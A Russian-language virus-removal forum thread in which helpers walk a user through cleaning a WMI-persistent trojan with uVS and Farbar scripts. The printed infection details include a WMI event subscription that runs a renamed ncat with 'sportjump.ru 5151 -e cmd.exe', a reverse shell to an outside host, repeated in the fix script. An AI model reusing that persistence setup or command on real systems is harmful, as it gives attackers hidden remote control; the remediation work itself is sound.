Перейти к содержанию

[РЕШЕНО] Trojan.Win32.GenAutorunWmiCommandLineEventConsumerRun.a


Рекомендуемые сообщения

Здравствуйте! При попытке скачать эксель (видимо, первая ссылка в браузере меня оказалась с подвохом) получила троян со страшным длинным названием. Касперский его обнаружил и предложил удалить, на что я согласилась. Но после он начал присылать мне, что обнаружил и запретил приложение WmiPrvSE.exe. Я провела полную проверку, угроз не обнаружено, но во время неё Касперский каждые 5 минут присылал одно и то же уведомление с обнаружением и запрещением того самого приложения и продолжает до сих пор. Скажите, что делать, пожалуйста..

CollectionLog-2024.04.22-02.39.zip

Ссылка на сообщение
Поделиться на другие сайты

1. Добавьте, пожалуйста, логи из журнала обнаружений антивируса Касперского

2.  Подготовьте логи анализа системы при помощи Farbar Recovery Scan Tool.

 

Ссылка на сообщение
Поделиться на другие сайты

Архив логов их журнала Касперского получается большим, чтобы прикрепить его сюда, поэтому даю ссылку на Яндекс.Диск https://disk.yandex.ru/d/UBNjrE1wT5CJzQ

FRST.txt Addition.txt

Ссылка на сообщение
Поделиться на другие сайты

+

Добавьте образ автозапуска системы в uVS.

1. Скачать архив программы можно отсюда:

2. Распакуйте данный архив с программой в отдельный каталог и запустите файл Start.exe
(для Vista, W7, W8, W10, W11 запускаем с правами администратора)
3. В стартовом окне программы - нажмите "запустить под текущим пользователем"
(если текущий пользователь с правами администратора).

4. Далее, меню "Файл" / Сохранить Полный образ автозапуска.

5. дождитесь, пока процесс создания файла образа завершится.
Сохраненный файл образа автозапуска (с именем Ваш_компьютер_дата_время.txt) автоматически добавится в архив 7z или rar.
6. Файл архива с образом автозапуска прикрепите к вашему сообщению на форуме. Ждем ответ.

Ссылка на сообщение
Поделиться на другие сайты

Выполните в uVS скрипт из буфера обмена.

ЗАпускаем start,exe от имени Администратора (если не запущен)

текущий пользователь,

Копируем скрипт ниже из браузера в буфер обмена. Закрываем браузер.

В главном меню выбираем "Скрипт - выполнить скрипт из буфера обмена"

Скрипт автоматически очистит систему и перезагрузит ее.

Скрипт ниже:
 

;uVS v4.15.2 [http://dsrt.dyndns.org:8888]
;Target OS: NTv10.0
v400c
OFFSGNSAVE
zoo %SystemDrive%\PROGRAMDATA\CLASSIC.{BB64F8A7-BEE7-4E1A-AB8D-7D8273F7FDB6}\NUN.BAT
;------------------------autoscript---------------------------

delall %SystemDrive%\PROGRAMDATA\CLASSIC.{BB64F8A7-BEE7-4E1A-AB8D-7D8273F7FDB6}\NUN.BAT
delall %SystemDrive%\PROGRAMDATA\CLASSIC.{BB06C0E4-D293-4F75-8A90-CB05B6477EEE}\NUN.BAT
delref %SystemDrive%\USERS\USER\APPDATA\LOCAL\YANDEX\YANDEXBROWSER\USER DATA\DEFAULT\EXTENSIONS\NPDPPLBICNMPOIGIDFDJADAMGFKILAAK\10.8_0\SAVEFROM.NET ПОМОЩНИК
delall %SystemRoot%\TEMP\PMNYYZBELNUA.SYS
apply

deltmp
delref {E984D939-0E00-4DD9-AC3A-7ACA04745521}\[CLSID]
delref %SystemRoot%\MICROSOFT.NET\FRAMEWORK\V2.0.50727\MSCORSEC.DLL
delref %SystemDrive%\PAPKA\ARC\PLUGINS\ARCPLUGINIE.DLL
delref {02BF25D5-8C17-4B23-BC80-D3488ABDDC6B}\[CLSID]
delref {166B1BCA-3F9C-11CF-8075-444553540000}\[CLSID]
delref {233C1507-6A77-46A4-9443-F871F945D258}\[CLSID]
delref {4063BE15-3B08-470D-A0D5-B37161CFFD69}\[CLSID]
delref {88D969C0-F192-11D4-A65F-0040963251E5}\[CLSID]
delref {88D969C1-F192-11D4-A65F-0040963251E5}\[CLSID]
delref {88D969C2-F192-11D4-A65F-0040963251E5}\[CLSID]
delref {88D969C3-F192-11D4-A65F-0040963251E5}\[CLSID]
delref {88D969C4-F192-11D4-A65F-0040963251E5}\[CLSID]
delref {88D969C5-F192-11D4-A65F-0040963251E5}\[CLSID]
delref {8AD9C840-044E-11D1-B3E9-00805F499D93}\[CLSID]
delref {CA8A9780-280D-11CF-A24D-444553540000}\[CLSID]
delref {CFCDAA03-8BE4-11CF-B84B-0020AFBBCCFA}\[CLSID]
delref {D27CDB6E-AE6D-11CF-96B8-444553540000}\[CLSID]
delref %SystemDrive%\PAPKA\ARC\PLUGINS\NPARCPLUGINFF.DLL
delref {0F8604A5-4ECE-4DE1-BA7D-CF10F8AA4F48}\[CLSID]
delref {E6FB5E20-DE35-11CF-9C87-00AA005127ED}\[CLSID]
delref %Sys32%\DRIVERS\VMBUSR.SYS
delref %SystemRoot%\MICROSOFT.NET\FRAMEWORK64\V2.0.50727\MSCORSEC.DLL
delref %Sys32%\DRIVERS\UMDF\USBCCIDDRIVER.DLL
delref %Sys32%\BLANK.HTM
delref %Sys32%\DRIVERS\HDAUDADDSERVICE.SYS
;-------------------------------------------------------------

restart
czoo

После перезагрузки системы добавьте файл Дата_времяlog.txt из папки uVS, напишите по результату, что с проблемой.

Архив ZOO_дата_время.7z загрузите на облачный диск и дайте ссылку на скачивание в ЛС.

Ссылка на сообщение
Поделиться на другие сайты

Касперский после перезагрузки системы не присылал уведомление об обнаружении и запрещении приложения (прошло 20 минут с перезагрузки). Сейчас в ЛС отправлю архив

2024-04-22_10-57-42_log.txt

Ссылка на сообщение
Поделиться на другие сайты

Возможно было ложное срабатывание на запуск данного файла

C:\PROGRAMDATA\AUX..\SHELLEXT.DLL

 

понаблюдайте некоторое время, возможно сообщение будет выходить с новым периодом.

лог обнаружения угроз  в антивирусе надо переделать.

 он нужен в текстовом формате:

например:

Quote

Сегодня, 28.03.2024 3:50:51        Задача завершена    Задача завершена                                        DESKTOP-K4PNU0M\ASUS    Активный пользователь
Сегодня, 28.03.2024 3:50:51    C:\Program Files\Process Hacker 2\ProcessHacker.exe    Не обработано    Лечение невозможно    not-a-virus:HEUR:RiskTool.Win32.ProcHack.gen    Пропущено    Файл    C:\Program Files\Process Hacker 2    ProcessHacker.exe    Не обработано    Легальная программа, которая может быть использована злоумышленником для нанесения вреда компьютеру или данным пользователя    Низкая    Эвристический анализ    DESKTOP-K4PNU0M\ASUS    Активный пользователь

 

Ссылка на сообщение
Поделиться на другие сайты

Спасибо. Судя по логу последние срабатывания были вчера.

Quote

Сегодня, 22.04.2024 10:56:12    Обнаружен вредоносный объект    WMI Provider Host    WmiPrvSE.exe    C:\Windows\System32\wbem    8040    NT AUTHORITY\СИСТЕМА    Системный пользователь    Обнаружено: PDM:Trojan.Win32.GenAutorunWmiCommandLineEventConsumerRun.a    Обнаружено    PDM:Trojan.Win32.GenAutorunWmiCommandLineEventConsumerRun.a    Троянское приложение    Высокая    Точно    WmiPrvSE.exe    WmiPrvSE.exe    C:\Windows\System32\wbem    Процесс    Поведенческий анализ
Сегодня, 22.04.2024 10:56:12    Запрещено    WMI Provider Host    WmiPrvSE.exe    C:\Windows\System32\wbem    8040    NT AUTHORITY\СИСТЕМА    Системный пользователь    Запрещено: PDM:Trojan.Win32.GenAutorunWmiCommandLineEventConsumerRun.a    Запрещено    PDM:Trojan.Win32.GenAutorunWmiCommandLineEventConsumerRun.a    Троянское приложение    Высокая    Точно    WmiPrvSE.exe    WmiPrvSE.exe   

 

Ссылка на сообщение
Поделиться на другие сайты

Есть еще подозрительный объект, который запускается через WMI:

Quote

 

Полное имя                  C:\PROGRAMDATA\NUL..\STARTMENUEXPERIENCEHOST.EXE
Имя файла                   STARTMENUEXPERIENCEHOST.EXE
Тек. статус                 ?ВИРУС? ПОДОЗРИТЕЛЬНЫЙ в автозапуске
                            
www.virustotal.com          2024-04-20 22:01 [2021-08-08]
-                           Файл был чист на момент проверки.
                            
Удовлетворяет критериям     
WMI_COMMANDLINEEVENTCONSUMER.LIST(CONSUMER_CLASS ~ COMMANDLINEEVENTCONSUMER)(1) [auto (0)]
                            
Сохраненная информация      на момент создания образа
Статус                      ПРОВЕРЕННЫЙ в автозапуске
File_Id                     610D7BD853000
Linker                      14.29
Размер                      322256 байт
Создан                      29.03.2024 в 19:49:18
Изменен                     07.08.2021 в 21:57:21
                            
TimeStamp                   06.08.2021 в 18:13:44
EntryPoint                  +
OS Version                  6.0
Subsystem                   Windows character-mode user interface (CUI) subsystem
IMAGE_FILE_DLL              -
IMAGE_FILE_EXECUTABLE_IMAGE +
Оригинальное имя            NCAT.EXE
Тип файла                   32-х битный ИСПОЛНЯЕМЫЙ
Цифр. подпись               Действительна, подписано Insecure.Com LLC
                            
Доп. информация             на момент обновления списка
SHA1                        8DB3F91ADDB22A506EAD3D0F7B9242A3F6CED640
MD5                         41889943C2AD6880ED7529B3132857A3
                            
Namespace                   \\.\root\subscription
Consumer_Name               nut
Consumer_Class              CommandLineEventConsumer
Consumer_CommandLineTemplateC:\ProgramData\NUL..\StartMenuExperienceHost.exe sportjump.ru 5151 -e cmd.exe
Filter_Name                 nut
Filter_Class                __EventFilter
Filter_Query                SELECT * FROM __InstanceModificationEvent WITHIN 180 WHERE TargetInstance ISA 'Win32_PerfFormattedData_PerfOS_System'
#MOF_Bind#                  
instance of __FilterToConsumerBinding
{
    Consumer = "CommandLineEventConsumer.Name=\"nut\"";
    Filter = "__EventFilter.Name=\"nut\"";
};

#MOF_Event#                 
instance of __EventFilter
{
    EventNamespace = "root\\cimv2";
    Name = "nut";
    Query = "SELECT * FROM __InstanceModificationEvent WITHIN 180 WHERE TargetInstance ISA 'Win32_PerfFormattedData_PerfOS_System'";
    QueryLanguage = "WQL";
};

#MOF_Consumer#              
instance of CommandLineEventConsumer
{
    CommandLineTemplate = "C:\\ProgramData\\NUL..\\StartMenuExperienceHost.exe sportjump.ru 5151 -e cmd.exe";
    Name = "nut";
};

                            

 

 

Выполните в uVS скрипт из буфера обмена.

ЗАпускаем start,exe от имени Администратора (если не запущен)

текущий пользователь,

Копируем скрипт ниже из браузера в буфер обмена. Закрываем браузер.

В главном меню выбираем "Скрипт - выполнить скрипт из буфера обмена"

Скрипт автоматически очистит систему и перезагрузит ее.

Скрипт ниже:
 

;uVS v4.15.2 [http://dsrt.dyndns.org:8888]
;Target OS: NTv10.0
v400c
OFFSGNSAVE
zoo %SystemDrive%\PAPKA\LDPLAYER\LDMUTIPLAYER\DNMULTIPLAYEREX.EXE
zoo %SystemDrive%\PAPKA\LDPLAYER\LDPLAYER9\DNPLAYER.EXE
zoo %SystemDrive%\PROGRAMDATA\AUX..\UTSHELLEXT.DLL
zoo %SystemDrive%\PROGRAMDATA\AUX..\SHELLEXT.DLL
zoo %SystemDrive%\PROGRAMDATA\NUL..\STARTMENUEXPERIENCEHOST.EXE
;---------command-block---------
delall %SystemDrive%\PAPKA\LDPLAYER\LDMUTIPLAYER\DNMULTIPLAYEREX.EXE
delall %SystemDrive%\PAPKA\LDPLAYER\LDPLAYER9\DNPLAYER.EXE
delall %SystemDrive%\PROGRAM FILES\LDPLAYER9BOX\LD9BOXSUP.SYS
apply

restart
czoo

После перезагрузки системы добавьте файл Дата_времяlog.txt из папки uVS, напишите по результату, что с проблемой.

Архив ZOO_дата_время.7z загрузите на облачный диск и дайте ссылку на скачивание в ЛС.

Изменено пользователем safety
Ссылка на сообщение
Поделиться на другие сайты

Скачайте по ссылке файл и разархивируйте.

Запустите каждый файл и подтвердите внесение информации в реестр.


1. Выделите следующий код и скопируйте в буфер обмена (правая кнопка мышиКопировать)

Start::
CreateRestorePoint:
S2 BITS_bkp; C:\Windows\System32\qmgr.dll [1481216 2024-04-02] (Microsoft Windows -> Microsoft Corporation)
S2 dosvc_bkp; C:\Windows\system32\dosvc.dll [1534464 2024-04-11] (Microsoft Windows -> Microsoft Corporation)
S2 UsoSvc_bkp; C:\Windows\system32\usosvc.dll [570368 2024-04-11] (Microsoft Windows -> Microsoft Corporation)
S3 WaaSMedicSvc_bkp; C:\Windows\System32\WaaSMedicSvc.dll [427520 2024-04-02] (Microsoft Windows -> Microsoft Corporation)
S3 wuauserv_bkp; C:\Windows\system32\wuaueng.dll [3436544 2024-04-11] (Microsoft Windows -> Microsoft Corporation)
R4 WinRing0_1_2_0; C:\Windows\TEMP\pmnyyzbelnua.sys [14544 2024-04-22] (Noriyuki MIYAZAKI -> OpenLibSys.org) <==== ВНИМАНИЕ
Folder: C:\ProgramData\Classic.{BB64F8A7-BEE7-4E1A-AB8D-7D8273F7FDB6}
Folder: C:\ProgramData\Classic.{BB06C0E4-D293-4f75-8A90-CB05B6477EEE}
WMI:subscription\__FilterToConsumerBinding->CommandLineEventConsumer.Name=\"nur\"",Filter="__EventFilter.Name=\"nur\"::
WMI:subscription\__FilterToConsumerBinding->CommandLineEventConsumer.Name=\"pers\"",Filter="__EventFilter.Name=\"pers\"::
WMI:subscription\__FilterToConsumerBinding->CommandLineEventConsumer.Name=\"nut\"",Filter="__EventFilter.Name=\"nut\"::
WMI:subscription\__FilterToConsumerBinding->CommandLineEventConsumer.Name=\"per\"",Filter="__EventFilter.Name=\"per\"::
WMI:subscription\__EventFilter->nur::[Query => SELECT * FROM __InstanceModificationEvent WITHIN 300 WHERE TargetInstance ISA 'Win32_PerfFormattedData_PerfOS_System']
WMI:subscription\__EventFilter->nut::[Query => SELECT * FROM __InstanceModificationEvent WITHIN 180 WHERE TargetInstance ISA 'Win32_PerfFormattedData_PerfOS_System']
WMI:subscription\__EventFilter->per::[Query => SELECT * FROM __InstanceModificationEvent WITHIN 600 WHERE TargetInstance ISA 'Win32_PerfFormattedData_PerfOS_System']
WMI:subscription\__EventFilter->pers::[Query => SELECT * FROM __InstanceModificationEvent WITHIN 900 WHERE TargetInstance ISA 'Win32_PerfFormattedData_PerfOS_System']
WMI:subscription\CommandLineEventConsumer->nur::[CommandLineTemplate => C:\ProgramData\Classic.{BB06C0E4-D293-4f75-8A90-CB05B6477EEE}\nun.bat][ExecutablePath => C:\ProgramData\Classic.{BB06C0E4-D293-4f75-8A90-CB05B6477EEE}\nun.bat]
WMI:subscription\CommandLineEventConsumer->nut::[CommandLineTemplate => C:\ProgramData\NUL..\StartMenuExperienceHost.exe sportjump.ru 5151 -e cmd.exe]
WMI:subscription\CommandLineEventConsumer->per::[CommandLineTemplate => C:\ProgramData\Classic.{BB64F8A7-BEE7-4E1A-AB8D-7D8273F7FDB6}\nun.bat][ExecutablePath => C:\ProgramData\Classic.{BB64F8A7-BEE7-4E1A-AB8D-7D8273F7FDB6}\nun.bat]
WMI:subscription\CommandLineEventConsumer->pers::[CommandLineTemplate => C:\ProgramData\AUX..\ShellExt.dll C:\ProgramData\AUX..\utshellext.dll]
BHO-x32: ArcPluginIEBHO Class -> {84BFE29A-8139-402a-B2A4-C23AE9E1A75F} -> C:\papka\Arc\Plugins\ArcPluginIE.dll => Нет файла
Reboot:
End::

2. Запустите Farbar Recovery Scan Tool от имени Администратора по правой кнопке мыши.
3. Нажмите один раз на кнопку Fix (Исправить) и подождите. Программа создаст лог-файл (Fixlog.txt). Пожалуйста, прикрепите его в следующем сообщении.

  • Обратите внимание: будет выполнена перезагрузка компьютера.


После перезагрузки удалите старые и соберите новые логи FRST.txt и Addition.txt.

Ссылка на сообщение
Поделиться на другие сайты

Касперский после перезагрузки системы не присылал уведомление об обнаружении и запрещении приложения. Сейчас в ЛС отправлю архив

2024-04-23_11-29-14_log.txt

 

И лог-файлы для thyrex

Addition.txt Fixlog.txt FRST.txt

Ссылка на сообщение
Поделиться на другие сайты

1. Выделите следующий код и скопируйте в буфер обмена (правая кнопка мышиКопировать)

Start::
CreateRestorePoint:
IFEO\svchost.exe: [GlobalFlag] C:\ProgramData\Classic.{BB06C0E4-D293-4f75-8A90-CB05B6477EEE}\nun.bat
HKLM\...\SilentProcessExit\svchost.exe: [MonitorProcess] C:\ProgramData\Classic.{BB06C0E4-D293-4f75-8A90-CB05B6477EEE}\nun.bat
IFEO\TrustedInstaller.exe: [GlobalFlag] C:\ProgramData\Classic.{BB64F8A7-BEE7-4E1A-AB8D-7D8273F7FDB6}\nun.bat
HKLM\...\SilentProcessExit\TrustedInstaller.exe: [MonitorProcess] C:\ProgramData\Classic.{BB64F8A7-BEE7-4E1A-AB8D-7D8273F7FDB6}\nun.bat
Edge HomePage: Default -> hxxps://?
Edge StartupUrls: Default -> "hxxps://?"
2024-04-22 01:38 - 2024-04-22 10:57 - 000000000 _RSHD C:\ProgramData\Classic.{BB64F8A7-BEE7-4E1A-AB8D-7D8273F7FDB6}
2024-04-22 01:38 - 2024-04-22 10:57 - 000000000 _RSHD C:\ProgramData\Classic.{BB06C0E4-D293-4f75-8A90-CB05B6477EEE}
FirewallRules: [{2ca0ac4f-06cc-4485-bd82-74173a5cfbf0}] => (Allow) C:\papka\LDPlayer\LDPlayer9\dnplayer.exe => Нет файла
FirewallRules: [TCP Query User{74F56A9F-9121-4452-9F35-9E1F836672C6}E:\sdi_r2309\sdi_x64_r2309.exe] => (Block) E:\sdi_r2309\sdi_x64_r2309.exe => Нет файла
FirewallRules: [UDP Query User{747D95DB-300C-4331-9811-04E42D22D602}E:\sdi_r2309\sdi_x64_r2309.exe] => (Block) E:\sdi_r2309\sdi_x64_r2309.exe => Нет файла
Reboot:
End::

2. Запустите Farbar Recovery Scan Tool от имени Администратора по правой кнопке мыши.
3. Нажмите один раз на кнопку Fix (Исправить) и подождите. Программа создаст лог-файл (Fixlog.txt). Пожалуйста, прикрепите его в следующем сообщении.

  • Обратите внимание: будет выполнена перезагрузка компьютера.


 
Ссылка на сообщение
Поделиться на другие сайты
Гость
Эта тема закрыта для публикации ответов.
  • Похожий контент

    • JAZZ and JAZZ
      От JAZZ and JAZZ
      При включении ноутбука и загрузки ОС через 2-5мин начинается нагрев ЦП до 92 градусов GPU до 63 градусов.
      При этом сам запускается процесс fc.exe в видеокарте NVIDIA хотя она должна быть не активной, проблему поймал день назад ноут уходит в сильный перегрев.
      Пробовал лечить, результата нет.
      CollectionLog-2024.10.07-23.37.zip
    • hu553in
      От hu553in
      Проблема схожая с соседними темами.
      C:\ProgramData\Google\Chrome\updater.exe, который восстанавливается сам собой, Malwarebytes кладет его в карантин с пометкой Trojan.Crypt.Generic ежеминутные запросы от C:\Windows\System32\dialer.exe на fcm1sx3iteasdfyn2ewsd.zip, которые Malwarebytes так же блокирует в hosts все домены Windows Updates и антивирусов редиректятся на 0.0.0.0 Удаление не помогает, никакой софт для удаления (KVRT, drweb, Malwarebytes и т.п.) не помогает.
      Помогите пожалуйста.
      Прикрепляю FRST и UVS отчеты по инструкциям из соседних тем.
      DESKTOP-CIJDVRS_2024-09-22_22-35-23_v4.99.1v x64.7z Addition.txt FRST.txt
    • Freudis
      От Freudis
      После недавно установленного zip файла компьютер начал тупить, нагреваться и шуметь. Данный файл не запрашивал права администратора да и сам файл я не запускал. Проверял компьютер куреитами, ничего не нашли. Один касперский обнаружил 1 файл, но этот файл был под именем систем файла, точный файл не знаю, но в процессе лечения после перезагрузки я решил открыть диспетчер задач, выявило ошибку "нет доступа или администратор запретил доступ". Решил запустить хоть гугл, та же ошибка. Перевзловнованный выдернул из розетки включатель компьютера, доступ ко всему вернулся, касперский ничего не сделал, но после этого компьютер начал нагреваться и в один момент очень сильно зашумел, я начал подозревать что есть вирусы под именем системных файлов, ведь зная касперский, лишь он нашёл 1 вирус и именно при его удалении с перезагрузкой доступ пропал к приложениям. Перерыл интернет, ноль информации. Но и заканчивать работу каких нибудь svchost.exe или подобное я очень боюсь. Решил обратиться за помощью к единственному кто нашёл этот вирус. Помогите, пожалуйста.
      У меня windows 10
       
    • parnishka
      От parnishka
      Вот такая проблема, при сканировании касперский обнаружил какие-то Luiminati в Media get 2 и в папке яндекса троян UDS Shelm, логи скоро сделаю
       
      А и да, компьютер виснет намертво после удаления, приложения открывает через 20 минут а при выключении через кнопку (Пуск не работает, меню не открывается) он пишет что выключается а не выключается 
    • ArCtic
      От ArCtic
      Здравствуйте! Помогите, пожалуйста, избавиться от  последствий вируса, который не давал запустить любую утилиту антивируса. Сам вирус уже удален, но папки от него остались. Открыть и удалить их не выходит.

      CollectionLog-2024.08.25-09.23.zip
×
×
  • Создать...